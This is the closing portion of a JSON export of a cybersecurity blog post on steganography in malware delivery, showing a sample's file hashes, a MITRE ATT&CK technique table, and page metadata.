wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA1\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        E410EAD2770CE196EDF9386995CA3B65BA2601BA\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SHA256\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        82BA07E40FF6DDAC997318C88FC04F0940B4FDD16979FE7F2F37C2CF80800F0C\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell 
wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SSDEEP\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        768:uO91WZoMDrFPKcdgeX52VRkWsKCWsKKWsKSWsKFcgtRbyNDNwWsKuWsKumRtCAdE:uO7WZdpEgWqWSWaWDWGWmDA1Xu1\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-35'>\ntable#wpdtSimpleTable-35{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-35 td, table.wpdtSimpleTable35 th { white-space: normal !important; }\n<\/style>\n\n\n\n\n<h3 class=\"wp-block-heading\">Appendix 2: MITRE MATRIX&nbsp;<\/h3>\n\n\n\n<p>Excluding the tactics and techniques used by the downloaded malware samples.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-36\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"8\"\n           data-wpID=\"36\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"A1\"\n                    
data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Tactics\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Techniques\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:33.333333333333%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"2\"                     data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0001: Initial Access                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    
data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1566.001: Phishing. Spearphishing Attachment\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Send spearphishing emails with a malicious attachment\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1566.002: Phishing. 
Spearphishing Link\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Send spearphishing emails with a malicious link\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"2\"                     data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0002: Execution                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1203: Exploitation for Client Execution\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exploit software vulnerabilities in client 
applications to execute code\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1059.005: Command and Scripting Interpreter: Visual Basic\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Abuse of command and script interpreters to execute commands, scripts, or binaries\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-merged-cell \"\n                     colspan=\"1\"  rowspan=\"3\"                     data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TA0005: Defense Evasion                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"         
           padding:10px;\n                    \"\n                    >\n                                        T1027.010: Obfuscated Files or Information: Command Obfuscation\u00a0\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-empty-cell \"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                                            <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1027.003: Obfuscated Files or Information: Steganography\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-empty-cell \"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                                            <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                            <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    
data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        T1218.009: System Binary Proxy Execution: Regasm\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Bypass process and\/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries                     <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-36'>\ntable#wpdtSimpleTable-36{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-36 td, table.wpdtSimpleTable36 th { white-space: normal !important; }\n<\/style>\n\n","protected":false},"excerpt":{"rendered":"<p>UPD: The section &#8220;Additional tasks&#8221; has been updated to include a new November 2023 steganography campaign. Malware delivery techniques are always evolving to bypass security measures. 
Gone are the days when a scammer could simply send an executable file as an email attachment \u2014 today, it simply won&#8217;t get past email filters.\u00a0 Threat actors are [&hellip;]<\/p>\n","protected":false},"author":6,"featured_media":6058,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[57,34,40],"class_list":["post-6047","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-malware-analysis","tag-anyrun","tag-malware-analysis","tag-malware-behavior"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.10 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog<\/title>\n<meta name=\"description\" content=\"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Stas Gaivoronskii\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"},\"author\":{\"name\":\"Stas Gaivoronskii\",\"@id\":\"https:\/\/any.run\/\"},\"headline\":\"Unpacking the Use of Steganography in Recent Malware Attacks\",\"datePublished\":\"2023-10-24T05:34:04+00:00\",\"dateModified\":\"2023-12-01T07:48:11+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"},\"wordCount\":1582,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"keywords\":[\"ANYRUN\",\"malware analysis\",\"malware behavior\"],\"articleSection\":[\"Malware Analysis\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\",\"name\":\"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog\",\"isPartOf\":{\"@id\":\"https:\/\/any.run\/\"},\"datePublished\":\"2023-10-24T05:34:04+00:00\",\"dateModified\":\"2023-12-01T07:48:11+00:00\",\"description\":\"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within 
images.\",\"breadcrumb\":{\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Malware Analysis\",\"item\":\"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Unpacking the Use of Steganography in Recent Malware Attacks\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN&#039;s Cybersecurity Blog\",\"description\":\"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.\",\"publisher\":{\"@id\":\"https:\/\/any.run\/\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/any.run\/?s={search_term_string}\"},\"query-input\":\"required 
name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"ANY.RUN\",\"url\":\"https:\/\/any.run\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg\",\"width\":1,\"height\":1,\"caption\":\"ANY.RUN\"},\"image\":{\"@id\":\"https:\/\/any.run\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/www.any.run\/\",\"https:\/\/twitter.com\/anyrun_app\",\"https:\/\/www.linkedin.com\/company\/30692044\",\"https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/any.run\/\",\"name\":\"Stas Gaivoronskii\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/any.run\/\",\"url\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png\",\"contentUrl\":\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png\",\"caption\":\"Stas Gaivoronskii\"},\"description\":\"Stas is a malware analyst at ANY.RUN. He has more than 11 years of experience in the digital forensics field and 4 years in malware analysis.\u00a0\",\"url\":\"#molongui-disabled-link\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. 
-->","yoast_head_json":{"title":"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog","description":"Discover an analysis of steganographic malware and see what techniques attackers use to hide malicious code within images.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","twitter_misc":{"Written by":"Stas Gaivoronskii","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#article","isPartOf":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"},"author":{"name":"Stas Gaivoronskii","@id":"https:\/\/any.run\/"},"headline":"Unpacking the Use of Steganography in Recent Malware Attacks","datePublished":"2023-10-24T05:34:04+00:00","dateModified":"2023-12-01T07:48:11+00:00","mainEntityOfPage":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"},"wordCount":1582,"commentCount":0,"publisher":{"@id":"https:\/\/any.run\/"},"keywords":["ANYRUN","malware analysis","malware behavior"],"articleSection":["Malware Analysis"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","url":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/","name":"Unpacking the Use of Steganography in Recent Malware Attacks - ANY.RUN&#039;s Cybersecurity Blog","isPartOf":{"@id":"https:\/\/any.run\/"},"datePublished":"2023-10-24T05:34:04+00:00","dateModified":"2023-12-01T07:48:11+00:00","description":"Discover an analysis 
of steganographic malware and see what techniques attackers use to hide malicious code within images.","breadcrumb":{"@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/any.run\/cybersecurity-blog\/steganography-in-malware-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/any.run\/cybersecurity-blog\/"},{"@type":"ListItem","position":2,"name":"Malware Analysis","item":"https:\/\/any.run\/cybersecurity-blog\/category\/malware-analysis\/"},{"@type":"ListItem","position":3,"name":"Unpacking the Use of Steganography in Recent Malware Attacks"}]},{"@type":"WebSite","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/","name":"ANY.RUN&#039;s Cybersecurity Blog","description":"Cybersecurity Blog covers topics for experienced professionals as well as for those new to it.","publisher":{"@id":"https:\/\/any.run\/"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/any.run\/?s={search_term_string}"},"query-input":"required 
name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/any.run\/","name":"ANY.RUN","url":"https:\/\/any.run\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2020\/08\/ANYRUN-Icon.svg","width":1,"height":1,"caption":"ANY.RUN"},"image":{"@id":"https:\/\/any.run\/"},"sameAs":["https:\/\/www.facebook.com\/www.any.run\/","https:\/\/twitter.com\/anyrun_app","https:\/\/www.linkedin.com\/company\/30692044","https:\/\/www.youtube.com\/channel\/UCOgCPho7lzmH7m6fPNlukrQ"]},{"@type":"Person","@id":"https:\/\/any.run\/","name":"Stas Gaivoronskii","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/any.run\/","url":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png","contentUrl":"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2023\/09\/Stasphoto.png","caption":"Stas Gaivoronskii"},"description":"Stas is a malware analyst at ANY.RUN. 
He has more than 11 years of experience in the digital forensics field and 4 years in malware analysis.\u00a0","url":"#molongui-disabled-link"}]}},"_links":{"self":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047"}],"collection":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/comments?post=6047"}],"version-history":[{"count":8,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047\/revisions"}],"predecessor-version":[{"id":6402,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/posts\/6047\/revisions\/6402"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media\/6058"}],"wp:attachment":[{"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/media?parent=6047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/categories?post=6047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/any.run\/cybersecurity-blog\/wp-json\/wp\/v2\/tags?post=6047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}